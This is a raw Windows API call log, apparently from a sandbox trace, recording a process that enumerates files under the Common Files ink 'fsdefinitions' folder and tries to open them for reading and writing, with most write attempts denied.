[0083.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0083.771] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.771] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.771] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.772] CloseHandle (hObject=0x42c) returned 1 [0083.772] AreFileApisANSI () returned 1 [0083.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85300 [0083.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 76 [0083.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.772] GetLastError () returned 0x5 [0083.772] GetLastError () returned 0x5 [0083.772] SetLastError (dwErrCode=0x5) [0083.772] GetLastError () returned 0x5 [0083.772] SetLastError (dwErrCode=0x5) [0083.772] GetLastError () returned 0x5 [0083.772] SetLastError (dwErrCode=0x5) [0083.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0083.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0083.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.772] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0083.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.774] AreFileApisANSI () returned 1 [0083.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", lpUsedDefaultChar=0x0) returned 75 [0083.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.774] AreFileApisANSI () returned 1 [0083.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0083.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0083.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0083.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.774] GetLastError () returned 0x5 [0083.774] GetLastError () returned 0x5 [0083.774] SetLastError (dwErrCode=0x5) [0083.774] GetLastError () returned 0x5 [0083.774] SetLastError (dwErrCode=0x5) [0083.774] GetLastError () returned 0x5 [0083.774] SetLastError (dwErrCode=0x5) [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0083.775] AreFileApisANSI () returned 1 [0083.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0083.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0083.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0083.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.775] GetLastError () returned 0x5 [0083.775] GetLastError () returned 0x5 [0083.775] SetLastError (dwErrCode=0x5) [0083.775] GetLastError () returned 0x5 [0083.775] SetLastError (dwErrCode=0x5) [0083.775] GetLastError () returned 0x5 [0083.775] SetLastError (dwErrCode=0x5) [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0083.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0083.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.776] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.776] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78490 [0083.776] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.776] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x73d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0083.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x51398 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0083.777] AreFileApisANSI () returned 1 [0083.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpUsedDefaultChar=0x0) returned 93 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.778] AreFileApisANSI () returned 1 [0083.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xba) returned 0x80a30 [0083.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=93 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 93 [0083.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0083.926] GetFileType (hFile=0x428) returned 0x1 [0083.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.929] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.930] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.930] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.930] CloseHandle (hObject=0x428) returned 1 [0083.930] AreFileApisANSI () returned 1 [0083.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0083.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xba) returned 0x80a30 [0083.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=93 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 93 [0083.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.931] GetLastError () returned 0x5 [0083.931] GetLastError () returned 0x5 [0083.931] SetLastError (dwErrCode=0x5) [0083.931] GetLastError () returned 0x5 [0083.931] SetLastError (dwErrCode=0x5) [0083.931] GetLastError () returned 0x5 [0083.931] SetLastError (dwErrCode=0x5) [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0083.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.931] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xb8, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x513a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xb8, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ܽ")) returned 0 [0083.931] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0083.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0083.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 